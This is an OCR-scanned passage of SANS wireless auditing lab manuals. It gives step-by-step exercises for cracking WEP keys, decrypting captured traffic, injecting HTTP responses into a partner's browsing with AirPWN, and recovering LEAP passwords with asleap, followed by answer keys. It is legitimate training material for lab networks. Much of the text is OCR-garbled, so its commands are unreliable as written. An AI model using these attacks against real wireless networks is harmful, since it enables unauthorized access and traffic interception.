intentionally left blank.Lab 6 - Auditing WEP Networks Complete the exercises in this lab to reinforce the material covered in the Auditing WEP Networks module. To complete these exercises, you will need the materials included in the SWAT toolkit.Lab 6-1: Examining WEP Traffic Purpose: Provide an introduction to several tools to recover WEP keys using a variety of different recovery methods. Description: In this lab, we'll take a look at the WEP header format and recover the WEP key from a variety of supplied capture files, exploiting different weaknesses in WEP and WEP implementations. We'll also assess a lab network to recover a WEP key in a live environment. 6.1.1. Examine the WEP Header In every WEP packet is an initialization vector, key index number and integrity check value, Let's take a look at these fields in a sample packet capture file. Open an XTerm window and change to the /tmp/lab6 folder. Use Wireshark to display the contents of the "nd1.dump" file, as shown below. # od /tmp/labé # pwd Zemp/Lab6 4 wireshark -r ndi.dump -n & (11 2426 é Wireshark will display the contents of the ndl.dump packet capture file. In the packet dissector view, expand the "IEEE 802.11" tree, then expand the "WEP parameters” tree, as shown below.BSG o BW e HOF eQQQwy or ait ert Wireshark protocol dissector for WEP header data, Select the "Initialization Vector” value to highlight the corresponding bytes in the packet detail view for frame 1. Note the initialization vector value. Sclect the next packet from the same source MAC address (frame 3). Note the IV value for this packet as well. Repeat this step for frame 4. Question: What is the relationship between the [V values in frames 1, 3 and 4? Are they random or sequentially selected? Next, select frames 2, 5 and 6, noting the IV values for each. Question: What is the relationship between the IV values in frames 2, 5 and 6? Close Wireshark at the end of this step to release the nd .dump file. 6.1.2. Recovering Neesus Datacom 40-bit Keys In the course module we reviewed the weakness in Neesus Datacom 40-bit keys. In this step welll use the wep_crack tool by Tim Newsham to recover the WEP key in the supplied packet capture files First, run the "wep_crack" tool with no parameters to identify the available command-line options and usage. Note that at the time of this writing, wep_crack is not included in the Backtrack Linux distribution, Instead, a static binary of this tool has been provided in the Jabé directory.# wep_erack Usage? ./Wep_creck [-b] [~s] [-k num] packfile [wordfile] -b Bruteforce the key generator os Crack strong keys -k num Crack only one af the subkeys without using a key generator Wordfile must be specified when -b is not used t We can see from this output that wep_crack supports both a brute-force attack as well as a dictionary attack. Since other tools are better suited to mounting a dictionary attack against WEP keys, we'll ust use wep_crack in the brute-force mode. ‘Attempt to recover the WEP key in the “nd1.dump" file by running wep_crack with the "6" option, specifying the capture file as the last command-line argument, as shown below: ¥ wep_crack ~b ndi.dump

Question: Was wep_crack able to recover the WEP key for the ndl.dump file? Question: What is the WEP key used for this capture file? Please note the key somewhere handy. Question: How many seconds did wep_erack take to recover the key? How many guesses per second was wep_crack able to perform? Note that the string listed in the "generated by" message from wep_crack is not necessarily the same key used to generate the key. Rather, itis a string that will generate the same WEP key, representing a collision with the actual key. In an audit report, itis best to report the 40-bit WEP key in hex instead of the ASCII Neesus Datacom string, Repeat this step for the nd2.dump packet capture file. Question: What is the WEP key for the nd2.dump packet capture? How long did it take to recover the key? Repeat this step for the nd3.dump packet capture file. Note that the key selected for the WEP network captured in this file was not generated with the Neesus Datagram algorithm, and will not be recovered with wep_crack. In this case, simply note the totalamount of time required to test all 21-bit possible permutations of keys in the wep_crack brute-force algorithm. jow long did wep_crack take to test all permutations of keys for the nd3.dump 6.1.3. Mounting a Dictionary Attack A dictionary attack can be a very resource-intensive attack, Like the wep_crack brute- force attack, it only requires one or two packets but can take a significant time to complete. In the lab6 directory we have included a small English-based word list to use in conjunction with the WEPAttack tool. We can use the Unix "wo" tool to identify how many words are included in the file by counting the number of lines with the "=I" parameter. fi we -1 words 135425 words # This is a small dictionary file by all accounts. In an actual audit, a significantly larger dictionary file should be used that includes words from several languages. names, pop- culture references, variations of the company name and department, etc. Next, run the WEPAttack tool with no command-line arguments to get a list of available options. * ft wepattack WEPATTACK by Dominik Blunk and Alain Girardet - Version 0.1.3 usage: wepattack -f dumpfile [-w wordfile] [-m mode] [-n network] -£ dumpfile network dumpfile to read (in PCAP format as TCPDUMP or ETHEREAL uses) -w wordlist wordlist to use (default: stdin) =m mode xun wepattack in diffente modes (defauit: all) values: 64, 128, n64, n128 4 Question: Was WEPAttack able to recover the WEP key from the wepattack I dump capture file? Question: What is the key that was recovered? Please note the key somewhere handy. Question: Which of the four WEPAttack modes is reported as the mechanism used to generate the-key that was discovered? Question; How long did it take to recover the key? How many words per second is WEPAttack able to test? Repeat this step for the "wepattack2.dump" capture file. Question: Were you able to recover the key from the wepattack2.dump file? How long did wepattack run? 6.1.4. Mounting an Extended Dictionary Attack In the previous step, the file "wepattack2.dump" did not reveal the WEP key from the supplied dictionary file. We can extend a dictionary attack by including common permutations of words with John the Ripper, piping the output of John to WEPAttack. 6-63, run John the Ripper with no command-| options, as shown below. ne arguments to see a list of available # john John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer Usage: /usr/sre/john-1.6/run/john [OPTIONS] [PASSWORD-FTI 1 -single "single crack" mode -wordlist:FILE ~stdin wordlist mode, read words from FILE or stdin -rules enable rules for wordlist mode incremental { :MODE] incremental mode (using section MODE} external: MODE external mode or word filter stdout { : LENGTA] no cracking, just write words to stdout -restore[: FILE] restore an interrupted session (from FILE] session: FILE set session file name to FILE status |: FILE] print status of a session (from FILE} ~makechars:PTLE make @ charset, FILE will be overwritten show show cracked passwords test perform a benchmark -users:[-]LOGIN|UID[,..] load this (these) user(s) only groups: [-]GID[,..] load users of this (these) group(s) only -shells:(-]SHELL[, ..] load users with this (these) shell(s) only -salts:[-]COUNT load salts with at least COUNT passwords only format :NANE force ciphertext format NAME (DES/BSDI/ND5/BE/AFS/1M) ~savemem: LEVEL enable mamory saving, at LEVEL 1. # Note that the output presented here may be slightly different than the version included on the current Backtrack Linux distribution. The options *-wordlist", "rules", "-stdout" are what we will use to generate a list of dictionary word permutations. Let's examine the number of permutations John will create for each word in the wordlist. Create a file with one word using the "echo" command as shown below, and supply this file as a command-line option to John. F echo myword >oneword # john -wordlist:oneword -rules -stdout Myword mywords mywordi Mywordl mywordmyword drowym Amyword MYRORD words: $2 time: 0:6 # 0 1008 w/s: 52.00 current: MywordingNote that John creates 52 permutations for each word. If we took the time to convert our small dictionary file to include these permutations, it would grow from 135,425 words to over 7 million words Let's combine the flexibility of John with WEPAttack to attempt to recover the WEP key in the wepattack2.dump capture file. Using the wordlist supplied in the lab files, instruct John to create the dictionary permutations, passing the output to WEPAttack, as shown below. 4 john -wordlist:words -rules -stdout | wepattack -2 wepattack2.dump Extraction of necessary data was successfull! Founded BSSID: 1) 00 40 96 47 86 CE / Key 0 1 network loaded... Accepting wordlist data key no. Stanton key no. backpackers key no. chivalric key no. defied

4 Question; Was WEPAttack able to recover the WEP key for the wepattack?.dump file? Question: What is the key that was recovered? Please note the key somewhere handy. ‘Question: How many words did WEPAttack try as the WEP key before iden correct key? ng the ‘Question: Is the WEP key that was recovered a typical permutation implemented by users when selecting "strong" passwords? Question: What other techniques do users commonly implement when selecting strong passwords? Would it be valuable to add these permutations to John as well?” 6.1.5. Mounting a FMS Attack ‘The arrival of the Aircrack-ng tool is another significant blow to WEP networks. Previously, it was thought that WEP networks that filter common weak IV's would be immune to FMS attacks. In practice, WEP IV filtering makes these networks immune to attacks from AirSnort, but not from more advanced tools such as Aircrack-ng.In this step, we'll use the Aircrack-ng tool to recover the WEP key in the “aircrack- ng.dump" capture. First, let's take a look at the Aircrack-ng command-line options by running "airerack-ng" with no parameters, as shown below. # airerack-ng Airerack-ng 0.6.2 - (C} 2006 Thomas d'Otrappe Original work: Christophe Devine http: //w0w.aircrack-ng.org usage: aircrack-ng [options] <.cap / .ivs file(s)> Common options: -a ; force attack mode (1/WEP, 2/HPA-PSK) -e : target selection: network identifier -b : target selection: access point's MAC -4 : enable quiet mode (no status output) Static WEP cracking options: -e : search alpha-numeric characters only -t 2 search binary coded decimal chr only -h : search the numeric key for Fritz !BOX -d cmask> : debug - specify mask of the key (Al -m : MAC address to filter usable packets sn cnbits> : WEP key length : 64/128/12/236/512 i : WEP key index (1 to 4), default: any -f : bruteforce fudge factor, default: 2 -k : disable one attack method (1 te 17) -x or -x0 : disable last keybytes bruteforce -x1 : enable last keybyte bruteforcing (default) nx? : enable last two keybytes bruteforcing “x : disable bruteforce multithreading (SMP only) ~y : experimental single bruteforce mode -s : show ASCIT version of the key WPA-PSK cracking options: -w : path to a dictionary file Note that the "-n" option specifies whether Aircrack-ng should attempt to recover a 64-bi ora 128-bit key. Aircrack-ng even supports proprietary key lengths of 256 and 512 bits. By default, Aircrack-ng will attempt to recover the 128-bit key and will be unable to recover the key if the network uses a 64-bit key. For this reason, if the first attempt to recover the key with Airerack-ng does not succeed, the auditor should run Aircrack-ng again specifying "-n 64" to attack a 64-bit key.Next, take a look at the “aircrack-ng.dump" packet capture file with Wireshark. Launch Wireshark as shown below. Note that the aircrack-ng.dump packet capture file is very large, which may cause Wireshark to run slowly. # wireshark -r aizcrack-ng.dump -n & [1] 2345 ’ Question: What is the delta in time between the first and the last packet captured? Question: How many data packets are in the capture file? (Hint: You will need to apply a display filter to answer this question) (Hint; Select a data packet; check the display name for the type/subtype field) Next, quit Wireshark and return to the XTerm prompt. Initiate Aircrack-ng by specifying the "aircrack.dump" file as a command-line parameter, as shown below. # aircrack-ng aircrack.dump

é Question: Was Aircrack-ng able to recover the WEP key from the aircrack-ng.dump file? ‘Question: How long did it take for Aircrack-ng to recover the key? ‘Question: What is the WEP key that was recovered? Please note the key somewhere handy. Question: Is the WEP key discovered by Aircrack-ng likely to be recovered with wep_crack or WEPAttack? Why, or why not? 6.1.6. _ Decrypting WEP Traffic After recovering the WEP key we can use different tools to decrypt the contents of traffic to identify the extent of information disclosure on the network. 6.1.6.1 Decrypting Traffic with Wireshark Wireshark includes an option to decrypt the contents of WEP traffic when supplied with an appropriate WEP key. Let's look at this option for examining the plaintext contents of the file "nd2.dump". 6=10Start Wireshark, opening the "nd2.dump" capture file, as shown below. # wireshark -r nd2.dump -n & (11 2259 i ‘Next, navigate to the Wireshark preferences menu by clicking "Edit > Preferences". In the preferences window, expand the "Protocols" tree, then scroll and select the "IEEE 802.11" protocol as shown below. * [enon 11 wre an escort apne 00.1 doans dosuno pacetshare Fs: ore the web ee ery We ey a Wi ay Wo ey #8 We ay Wa ey #52 We ny war ey a7 Werte #0: Wer toy #9: WePhey 10: Wireshark preferences for the IEEE 802.1 packet dissector We can specify multiple WEP keys in the 802.11 preferences screen. Wireshark will attempt to decrypt every WEP-encrypted packet with each key you specify, until it decrypts the packet successfully, or runs out of keys to use. When specifying the WEP key, Wireshark will only accept the hex representation of the key, with each byte separated by colons. Wireshark will not accept ASCII strings for WEP keys. For example, if the WEP key is “f2 87 d5 99 73", you should enter the key as "£2:87:d5:99:73", 6-11Supply the WEP key for the nd2.dump file in the "WEP key #1" text box. Next, check the "Enable decryption" checkbox, then click "OK" to apply the settings. It is not necessary to supply more than the first key for decrying the traffic in this capture file NOTE: Supply the WEP key for the "nd2.dump" file that you discovered in step 6.1.2 At the Wireshark view, select frame number 2. Notice the tabs below the packet detail view, offering a selection of the frame as captured from the network and the "Decrypted WEP Data’ view. Inspect the data in these data frames and answer the questions below. Quit Wireshark when you are finished with this step. Question: What is the protocol for the two data packets in this capture file? Question: What valuable information can be observed from the unencrypted traffic content? Question: What kind of a server generated these packets? What version information can be determined form the packet content? 6.1.6.2 Decrypting Traffic with airdecap-ng The airdecap-ng tool supplied with Aircrack-ng tools takes an input libpeap file of WEP- encrypted content and the WEP key, generating an output file of unencrypted content. While Wireshark preserves the integrity of the header information in unencrypted WEP content, airdecap-ng generates a standard Ethernet file with the unencrypted packet content. At an XTerm prompt, run the airdecap-ng command with no options to see a list of the available command-line options, as shown below. # airdecap-ng Rirdecap-ng 0.6.2 - (C) 2006 Thomas d'Otreppe Original work: Christophe Devine http: //www.airerack-ag.org usage: airdecap-ng [options] -1 don't remove the 802.11 header ~b : access point MAC address filter -k 1 WPA Pairwise Master Key in hex ve : target network SSID -p : target network WPA passphrase -w : target network WEP key in hexThe usage for this tool is simple - specify the input file containing WEP-encrypted content, the desired filename for the output file, and the WEP key. Unlike Wireshark, the WEP key bytes are not separated by colons; simply supply the hexadecimal key bytes without any spacing or delimiters between bytes. Using the "nd1 dump" capture file, generate a libpeap file with airdecap-ng containing the unencrypted content, as shown below. ¥ airdecap-ng -w 0e:£0:a8:95:05 ndi.dump Total number of packets read Total number of WEP data packets Total number of WPA data packets Number of plaintext data packets Number of decrypted WEP packets Number of decrypted WPA packets # The airdecap-ng too! will create a new file by appending *-dec" to the filename before the extension of unencrypted data. Open the "ndl-dec.dump" capture file with Wireshark, tshark, tcpdump or strings to see the embedded message, 6.1.7. Live Key Recovery Intthis exercise welll capture traffic on a live lab network and attempt the recovery of the WEP key. Follow these steps to collect encrypted traffic and recover the WEP key for the target network. 6.1.7.1 Using Kismet, identify the channel in use for the "SANS-WEP" network. 6. Configure your wireless card in monitor mode on the same channel as the "SANS-WEP" network using the "iwconfig" tool, as shown below. Replace the channel number witi the correct channel identified in the previous step. ¥ iwconfig wlanO mode monitor channel W ¥ ifconfig wland up e 6-136.1.73. Capture traffic using the “airodump" packet capture tool, specifying the interface name and the libpeap capture filename, as shown below. ¥ airodump-ng -w lab§capture wland Note that airodamp will automatically append the extension ".cap" to the end of the file with a unique number, initially generating a "labGeapture-01.cap" filename. Continue capturing traffic until you have captured at least 200,000 [V's. After you have captured a sufficient amount of traffic, press "CTRL/C" to quit airodump-ng. NOTE: If the counter indicating the number of IV frames slows down considerably or stops, please alert a proctor or the instructor. 6.1.7.4 Use aircrack-ng to recover the WEP key as shown below. If Aircrack-ng is unable to recover the key after 1-2 minutes of processing, restart airodump-ng, specifying the same "labGcapture" filename. Airadump will append new packets to the end of the previous capture file. Capture an additional 25,000 IV's and retum to this step. Repeat until you have successfully recovered the WEP key. fi aircrack-ng -n 64 labGcapture* f Question: What is the WEP key that is recovered from the network? This completes our sixth lab exercise. Congratulations. @ 6-14Answers Section 6.1.1 Question: What is the relationship between the IV values in frames 1, 3 and 4? Are they random or sequentially selected? Answer: The three frames have {V's values that are one greater than the previous IV. The IV values are a sequential counter that is stored in big-endian format, Question: What is the relationship between the IV values in frames 2, 5 and 6? Answer: The IV's for this source address appear to be random. Section 6.1.2 Question: Was wep_crack able to recover the WEP key for the nd! dump file? Answer: Yes, the WEP key is 40-bits in length. Question: What is the WEP key used for this capture file? Please note the key somewhere handy. Answer: wep key 1: Oe:f0:a8:95:05 wep key 2: db:68:1¢:45:a5 la:d4:2c:1d:48 wep key 3: wep key 4: fsaf:d8:93:10 Question: How many seconds did wep_crack take to recover the key? How many guesses per second was wep_crack able to perform? Answer: An Intel Pentium Celeron 2 GHz processor was able to recover this key in a little over 7 seconds. Question: What is the WEP key for the nd2.dump packet capture? How long did it take to recover the key? Answer: Key recovery took 0.03 seconds on an Intel Pentium Celeron 2 GHz processor. wep key 1: 73:99:d5:87:12 wep key 2: 14:86:f0:42:6¢ wep key 3: 0e:34:65:da:93 wep key 4: 8d:de:26:d2:a3 Question: How long did wep_crack take to test all permutations of keys for the nd3.dump file? Answer: wep_crack ran for 24.45 seconds on an Intel Pentium Celeron 2 GHz processor. 6-15Section 6.1.3 Question: Was WEPAttack able to recover the WEP key from the wepattack | dump cupture file? Answer: Yes Question: What is the key that was recovered? Please note the key somewhere handy, Answer: "perpetuate" Question: Which of the four WEPAttack modes is reported as the mechanism used to generate the key that was discovered? Answer: The key was recovered with the with the 104-bit key generation algorithm (denoted with the word "KEYGEN" from wepattack) Question: How long did it take to recover the key? How many words per second is WEPAttack able to test? Answer: The key was recovered in approximately 1.8 seconds at a rate of over 8000 words/second. This time may vary depending on your processor speed and the speed of your hard drive. Question: Were you able to recover the key from the wepattack2.dump file? Answer: No. Wepatiack completed testing all 144,711 words in the dictionary file in approximately 17.9 seconds. Section 6.1.4 Question: Was WEPAttack able to recover the WEP key for the wepattack2.dump file? Answer: Yes. Question: What is the key that was recovered? Please note the key somewhere handy. Answer: "pacification!" Question: How many words did WEPAttack try as the WEP key before identifying the correct key? Answer: 1,458,457 words in approximately 3 minutes. ‘Question: Is the WEP key that was recovered a typical permutation implemented by users when selecting "strong” passwords? Answer: Yes, this key uses the common technique of adding punctuation to the end of passwords to make them difficult to guess. Question: What other techniques do users commonly implement when selecting strong passwords? Would it be valuable to add these permutations to John as well? 6-16Answer: Other common techniques include substituting the letter "a" for "@" or "4", substituting “i" with "1” (one) and substituting "e" with "3". Adding these additional permutations to John would make for an even more efficient dictionary attack. Section 6.1.5 Question: What is the delta in time between the first and the last packet captured? Answer: Four minutes, 14 seconds. This can be determined by subtracting the timestamp of the first file from the last file, or by inspecting the Wireshark analysis by clicking "Sta Question: How many data packets are in the capture file? Answer: 251,323 data packets in thé aircrack-ng.dump capture file. This can be identified by inspecting the status bar to identify the number of displayed packets after applying the display filter “wlan. fe.type_subtype eq 32" Question: Was Aircrack-ng able to recover the WEP key from the airerack-ng.dump file? Answer: Yes. Question: How long did it take for Airerack-ng fo recover the key’? Answer: I minute 13 seconds on a Pentium Celeron 2 GHz system. Question: What is the WEP key that was recovered? Please note the key somewhere handy. Answer: The WEP key is 83:6a:74:b5:93:a2:ac:fa:1e:c8:d6:e2:d7 Question: Is the WEP key discovered by Aircrack-ng likely to be recovered with wep_crack or WEPAttack? Why, or why not? Answer: WEPAttack would be unable to recover WEP keys that are not based on dictionary words, such as the key used in the airerack-ng.dump capture. With a sufficient ‘umber of packets, Aircrack-ng would be able to recover the WEP key regardless of whether itis based on an ASCII word or is completely random. Section 6.1.6.1 Question: What is the protocol for the two data packets in this capture file? Answer: The two data packets are multicast SSDP traffic for universal plug-and-play (UPNP), Question: What valuable information can be observed from the unencrypted traffic content’? Answer: IP address information is revealed. Question: What kind of a server generated these packets? What version information can be determined form the packet content? 6-17Answer: In the Hypertext Transfer Protocol header, we can identify the host as a Linux system running the 2.4.17 kernel. Section 6.1.7.4 Question: What is the WEP key that is recovered from the network? Answer: The WEP key is “al:31:90:09:24". 6-18Lab 7 - Client Attacks Complete the exercises in this lab to reinforce the material covered in the Wireless Client Exposure and Vulnerabilities module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included in the SWAT toolkit.Lab 7-1: Hotspot Injection Attacks Purpose: This lab will provide hands-on experience on demonstrating a traffic manipulation attack against a wireless station. Description: In this lab exercise you will use the AirPWN tool to manipulate the response toa client that makes an HTTP GET request to respond with arbitrary content of your choosing. In order to complete this lab, you will need to work with a partner system. One system will follow the steps marked "[VICTIM]" and will be the target of the denial-of-service attack, The second system will follow the steps marked "[ATTACKER]" to mount the injection attack. You may optionally wish to switch roles after completing this lab so each person has the opportunity to attack another system. 7.1.1. [VICTIM] Connect to the classroom network Execute the following commands from a shell prompt to connect to the SANS- ROGUE! network: killall dheped Awconfig wlan0 essid SANS-ROSUEO1 enc off mode managed dhoped -d wlan ‘At this point, your system should be connected to the SANS-ROGUED! network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance. 7.4.2. [VICTIM] Identify address informat Next, the victim will identify client information that will be used by the attacker to target the attack, The information that is needed is the IP address of the victim wireless card. ‘We can identify the IP address of the wireless card by running the "ifconfig" utility, as shown below: + ifconfig wland wlan? Link encap:Ethernet MWaddr 00:02:6F:33:BC:41 inet addr:172.16,0.101 Beast:172.16.0.255 Mask:255.255.255.0 DP BROADCAST NOTRAILERS RUNNING MULTICAST wTU:1500 Metric:1 RX packets: 43830 errors:0 dropped:20 overruns:0 fram TX packets:1397 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txquevelen:0 7-2Rx bytes: 3802818 (3.6 Wb) TX bytes:816024 (798.8 Kb) Interrupt:10 Memory:e836e000-e936£000 The string following “inet addr:" in this output represents the IP address of the wireless card, Write this address information in the space provide below. Next, use the "iwconfig" utility to identify the channel information for the access point you are currently associated to, as shown below. # iwconfig wiano wlen0 TREE. 802.11b ESSTD: "$ANS-ROGUEO1" Mode:Managed Frequency:2.462GHz Access Point: 00:0F:66:83:76:38 Bit Rate:11Mb/s Sensitivity=1/3 Retry min limit:8 roff Fragment thr Powsr Management Link Quality:23/70 Signal level:-70 dBm Noise level:-94 dBm kx invalid nwid:0 Rx invalid crypt:11 Rx invalid frag:0 1x excessive retries:0 Invalid misc:3663 Missed beacon:0 £ The string following "Frequency:" indicates the frequency that is in use. We can convert this value to the channel number by using the chart provided below. Identify the channel number in use by matching the frequency in the following chart: ered Coren etry ren 2.412 1 2.447 8 2.417 2 2.452 9 2.422 3 2.457 10 2.427 4 2.462 WT 2.432 5 2.467 12 2.437 6 2472 3 2.442 7 2.484 14 Use the following text-box to document the IP address, and channel number for the victim station: ae7.1.3. [VICTIM] Test web browsing Ensure the victim client can access web resources on the Intemet by opening the web browser (Firefox) on the victim and browsing to a public website such as www.google.com, 7.1.4. [ATTACKER] Examine injection file contents AirPWN uses at least two files for the attack: a configuration file that specifies the content that the attacker should respond to, and the response file which represents the actual content to respond with, For the purposes of this lab, we've supplied both the configuration file and the response file on the lab CD. Change to the lab 7 directory and examine the configuration file contents, as shown below: # cd /tmp/lab7 fis airpwnt airpen.1 conf/ content/ # cat conf /greet_html begin greet_html match * (GETPOST) ignore *GET [* ?]+\.(ipgljpeg|gif|png|tif|tiff) response content /greet_htmi We can see in the configuration file the "match" line is configured to match any text strings that begin with the string "GET" or "POST". In the "ignore" line, any text that begins with the string "GET" and ends in any of the specified file type extensions will be ignored, If both conditions are satisfied, the AirPWN tool responds with the content in the response file, "content/greet_htm!”. Next, examine the response file contents: + cat content/greet_html HTTP/1.1 200 OK Connection: close Content-Type: text/html chead>

Thanks for participating in the SANS SEC617 Client Attacks lab! Are we having fun yet?

‘We can see the response file contains an HTTP response message with simple HTML. content. Of course, this could be any content the attacker desired, 7.1.5. [ATTACKER] Introduction to AirPWN Next, run the AitPWN command with no command-line parameters to identify a list of available options, as shown below: 4 ./aizpwn usage: airpwa ~i -c -d -t [options) : interface to listen on {must be in monitor mode) : configuration file : supported wireless driver name : IP address of host you are targeting eional arguments: -C : channel number to snifé/inject on ~1 : log verbose data to a file -f : bpf filter for Libpcap ch: get help (this stuff) -v i increase verbosity (can be used multiple times) Supported drivers are: wlan-ng hostap airjack prism54 madwifiold madwifing rt18180 rt2500 rt2570 ? NOTE: If you are getting a "permission denied" error when running the airpwn, command, ensure you have specified the leading dot-slash ("/airpwn") as shown in the example above. Before using Airpwn, we need to modify the link type of the SWAT kit wireless card. With the HostAP drivers, the default link type in monitor mode is to include PrismAVS header information for RSSI reporting and other statistics. Airpwn does not support this header type, so it is necessary to change the link type to the standard 802.11 header with the iwpriv command, as shown: 4 Awpriv wlan0 monitor_type 0 # ‘The criti as follows: command-line options we are going to use for the injection attack are detailedCommand Argument (if any) Description option i wand Interface name to use for transmitting packets 6 Channel the victim is operating on -d wlanng Driver name used for wlan0 interface *t IP address of victim “c configreet_html Configuration file ‘Substitute the IP address in “" with the information collected from the victim station. Substitute the channel number in "" with the information collected from the victim station. Implementing the injection attack is straightforward. Simple run the AirPWN command with the appropriate arguments, as shown below: ¥ airpwn -i wlanO -C -d wlanng -t -c conf/greet_html. airpwn - modified for SANS SBC617 lab Listening for packets At this point, the attacker is positioned to manipulate the contents of any HTTP GET requests that originate from the specified IP address. 7.4.6. [VICTIM] Browse to an unencrypted website Return to the victim station and browse to any unencrypted website to generate the HTTP GET request that the attacker is configured to identify. Instead of the desired website content, you should receive the content from the attacker's response file. 7.1.7. [ATTACKER] Stop the client attack Return to the attacker's session and stop the injection attack by pressing "CTRL/C". This will cause AirPWN to stop gracefully, returning to the shel! prompt. 7.1.8. [VICTIM] Refresh website After the attacker stops the injection attack, the victim station should return to normal connectivity. Refreshing the target website should produce the appropriate results.If your system returns an error indicating “ioctI(): Device or resource is busy", it will be necessary to physically eject and reinsert your wireless card, Additional Exercise If you have extra time after completing this lab with your partner, modify the response file to supply your own message to the victim. Be creative, but polite. © Ry i ecto a > [oc I sys! ek hl ay deve Aegon"? ant oll. coThis page intentionally left blank.Lab 8 - Auditing LEAP Networks Complete the exercises in this lab to reinforce the material covered in the Auditing LEAP Networks module. To complete these exercises, you will need the lab files includes on the SANS Wireless LAN Auditing Lab CD,Lab 8-1: Examining LEAP Networks Purpose: Introduce the techniques used to identify LEAP networks from a supplied capture file. Description: In this lab we'll use a supplied capture file with mixed networks and extract, traffic that uniquely identifies the use of the Cisco LEAP protocol. 8.1.1, Identify LEAP Traffic Using the supplied capture file, identify all EAP traffic that uses the LEAP protocol. Start the Wireshark sniffer by clicking "K Run Command..." to open the Run ‘Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File -> Open", navigate to the /tmp/labS folder and select the "labStraffic.dump" capture file. Next, apply 2 display filter that will display only LEAP traffic. (Hint: Use the display fields in a packet marked as LEAP) (Hint: Select frame 211 fora sample LEAP packet) (Hint: Use the "type" field in the Extensible Authentication Protocol header) (Hint: The assigned EAP type for LEAP is 17 or hexadecimal Ox! 1) (Hint: "eap.type eq 17") (Hint: The display filter should return 38 packets) Note that this display filter identifies only traffic that includes LEAP data, and docs not include the start, stop, success or failure messages. We can apply a less-specific display filter that includes LEAP and other EAP-related traffic. Remove the previous display filter, replacing it with "eapol” to display all EAP traffic, regardless of EAP type. Question: How many packets are returned from this new filter? Question: What additional information is included in this packet display’?8.1.2, Examining the LEAP Five-Way Handshake ‘The five-way LEAP handshake defines how a station authenticates to an access point, and the access point mutually authenticates to the station. Let's take a look at this process. Apply the following filter to limit the display to the initial five-way handshake in the labStraffic.dump" capture file: eapol and frame.number > 210 and frame.number < 222" Examine the frames in this exchange and answer the questions below. Question: What is the MAC address of the access point? Question: What is the MAC address of the station? Question: What is the username of the authenticating user? Select frame 211, expanding the "Extensible Authentication Protocol" protocol dissector information. The field labeled "Peer Challenge" is the 8-byte challenge from the access point to the authentication station. Selecting frame 213, we can see that Wireshark has identified another value as the "Peer Challenge". Question: What is wrong with the "Peer Challenge" in frame 213? Frame 213 represents the response from the client station to the 8-byte challenge value. Note that Wireshark does not properly identify this frame, labeling it as "Peer Challenge" when it is more appropriately labeled "Peer Response". This field is also incorrectly identified as 8 bytes in length ("Peer Challenge [8]") when the contents of the field i bytes in length, as indicated by the "Count" field, 24 ‘The next frame in the five-way handshake is the success message from the AP, indicating that the authentication station's response to the challenge text was correct. Examine the last two frames in the five-way handshake and answer the questions that follow. Close Wireshark after finishing this step. Question: How does the client correctly identify the identity of the access point in the last 2 frames of the five-way handshake?Lab 8-2: Recover Passwords with Asleap Purpose: Introduce the use of Asleap as a mechanism to audit the security of Cisco LEAP networks. Description: In this lab we'll use the Asleap tool to mount a dictionary attack against the supplied Cisco LEAP transactions, potentially revealing the usernames and passwords of legitimate users. Weaknesses in the challenge/response mechanism plague many LEAP implementations, offering an easy target for an attacker. An auditor can use Asleap to identify vulnerable LEAP implementations that can be abused by an attacker. ‘As we saw in the course material, Asleap consists of two components: the "genkeys" tool which creates the database of NTLM hashes and passwords and the "asleap" tool which examines the LEAP five-way handshake and uses the genkeys database to identify weak user passwords. 8.2.1. Generate a NTLM Hash Database In this step, we'll use the genkeys tool and the supplied dictionary file to generate the database file and corresponding index file to supply to the asleap tool. First, open an XTerm window and change to the /tmp/lab8 folder, as shown below. fed /tmp/1abe # pwd /emp/1ab8 Run the genkeys command with no arguments to see a list of command-line options, as shown below. # genkeys Genkeys 1.4.2 - generates lookup file for asleap. genkeys: Must supply ~r ~£ and =n Usage! genkeys [options] -r Input dictionary file, one word per line -£ Output pass#hash filename -n Output index filename oh Last 2 hash bytes to filter with (optional)\Using the supplied wordlist file "words" in the lab8 directory, generate the database files to use with asleap, as shown below. Note that this example was generated on a Pentium 4.2.8 GHz system. # genkeys -r words -£ words.dat -n words. idx genkeys 1.4.2 - generates lookup file for asleap. Generating hashes for passwords (this may take some time) ...Done. 135426 hashes written in 0.60 seconds: 225487.15 hashes/second Starting sort (be patient) ...Done. Completed sort in 1055547 compares Creating index file (almost finished) ...Done. 41s -1 words.* ery-re-r 1 root root. 3813222 2005-04-21 13:53 words.dat are 1 root root 1030086 2005-04-21 13:53 words. idx ? Question: How many hashes/second was your system able to generate? After generating the database and index files with genkeys, we can proceed to auditing the LEAP challenge/response exchange for weak passwords with asleap. 8.2.2. Identify Weak Passwords In this step, we'll assess the supplied packet capture files for weak passwords, First, run the "asleap" tool with no arguments to see a list of available command-line options, as shown below. # asieap asleap 1.4.2 - actively recover LEAP/PPTP passwords. asleap: Must supply an interface with ~! Usage: asleap [options] 1, 0 a stored file with -r Read from a libpcap file Interface to capture on -£ Dictionary file with NT hashes “0 Index file for NT hashes mw Write the LEAP exchange to a libpcap file -s Skip the check to make sure authentication was successful ma Perform an active attack (faster, requires AirJack drivers) 8-5=e Specify a channel (defaults to current) -0 Perform channel hopping mt Specify a timeout watching for LEAP exchange (default 5 seconds) 2D List available devices for live capture mh Output this help information and exit vw Print verbose information (more -v for more verbosity) wv Print program version and exit a ASCII dictionary file (special purpose} ‘We can see from the usage options that we can read the LEAP transaction information form a libpcap file with the "-r" option, specifying the genkeys database file with "-f" and the genkeys index file with "-n' Use asleap to assess the LEAP transaction stored in the "leapexch! dump" capture file with the genkeys files created in the previous step, as shown below: # asleap -r leapexchi.dump -f words.dat -n words.idx asleap 1.4.2 ~ actively recover LEAP/PPTP passwords. Using the passive attack method Captured LEAP exchange information: vsernamé atrager challenge £92£ 966625097069 response: 98c9fbAsebd6c£3596ad605eTbAcdi 80941 6aR4L050248L4 hash bytes: 586c NT hash: 8846 £7eaaeBfb117ad06bdd830b7586C passwort pasword Closing peap + Question: Was asleap able to recover the username and password included in the leapexch!.dump LEAP transaction? Question: What was the password reported by asleap? Question: Does the calculated last 2 bytes of the NTLM hash displayed on the " bytes:” line of the asleap output match the last two bytes of the actual user password hash? Next, assess the contents of the LEAP transaction file stored in the “leapexch2.dump" capture file, as shown below:# asleap ~r 